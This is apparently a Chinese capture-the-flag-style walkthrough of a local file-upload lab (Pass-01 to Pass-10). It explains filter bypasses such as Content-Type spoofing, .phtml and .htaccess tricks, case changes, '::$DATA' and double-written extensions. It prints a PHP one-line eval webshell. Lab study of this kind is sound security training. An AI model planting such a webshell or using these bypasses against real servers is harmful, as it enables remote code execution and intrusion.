文章目录
- 一、Pass-01
- 1.抓包上传
- 2.获取上传路径
- 3.工具验证
- 二、Pass-02
- 三、Pass-03
- 1.使用httpd.conf自定义后缀
- 2.提取上传文件名
- 3.工具测试
- 4.注意点
- 四、Pass-04
- 1.上传.htaccess
- 2.上传图片
- 3.工具测试
- 五、Pass-05
- 六、Pass-06
- 1.空格+.号绕过
- 2.工具测试
- 七、Pass-07
- 八、Pass-08
- 1.特殊符号绕法
- 2.工具测试
- 九、Pass-09
- 1.特殊符号+.+空格组合绕过
- 2.工具测试
- 十、Pass-10
- 1.双写绕过
- 2.工具测试
一、Pass-01
1.抓包上传
只能上传jpg,png,gif格式图片,因此先选一个jpg,然后抓包修改文件类型和文件数据
2.获取上传路径
接下来需要知道文件上传到哪个目录下
可以看出上传到上一级目录的upload文件夹了,而当前目录是
http://127.0.0.1/upload/Pass-01/index.php,即http://127.0.0.1/upload/Pass-01/
因此上一级目录是http://127.0.0.1/upload/
即最终上传路径是http://127.0.0.1/upload/upload/
可以看出已上传成功,接下来用工具连接验证下
3.工具验证
F12解析成功
说明连接和调用成功
二、Pass-02
还是用上一题的办法
<?php @eval($_POST["fname"]);?>Content-Type: image/jpeg
Content-Type:application/octet-stream
三、Pass-03
不出所料不能用老办法了
1.使用httpd.conf自定义后缀
那就改后缀绕过,改成3.phtml
2.提取上传文件名
发现可以上传,但是文件名被改了,没关系可以提取,202306261154331548.phtml
验证下看能不能解析,发现不行
3.工具测试
猜测应该是我的皮卡丘版本较老,换装新版本试下
菜刀也连接成功了
4.注意点
值得说明的是一句话代码那里第一个空行不要删,不然上传不会成功的
四、Pass-04
显然phtml也被禁了,不信你可以试下
1.上传.htaccess
尝试使用.htaccess文件,先上传它
2.上传图片
然后上传图片,只要加一句话木马就行,其他不用改
3.工具测试
测试下
五、Pass-05
好吧,这关.htaccess也不能用了
大小写绕过
但是Php是不是可以呢
上传成功,试下能不能运行
OK 搞定
六、Pass-06
1.空格+.号绕过
试了下大小写绕过失败,.htaccess上传失败
最后用这种奇怪的方法组合绕过了,即空格+.号绕过
2.工具测试
七、Pass-07
同上题绕法
这个狠,试下上题的方法先
这次也上传成功了
工具测试
OK 搞定
八、Pass-08
这次不行了
1.特殊符号绕法
试下特殊符号绕法:1.php::$DATA
果然可以
2.工具测试
OK 搞定
九、Pass-09
1.特殊符号+.+空格组合绕过
2.工具测试
看来这个也没问题了
十、Pass-10
1.双写绕过
发现会把php去掉,那就来个双写绕过
很好,上传成功
2.工具测试
OK 搞定
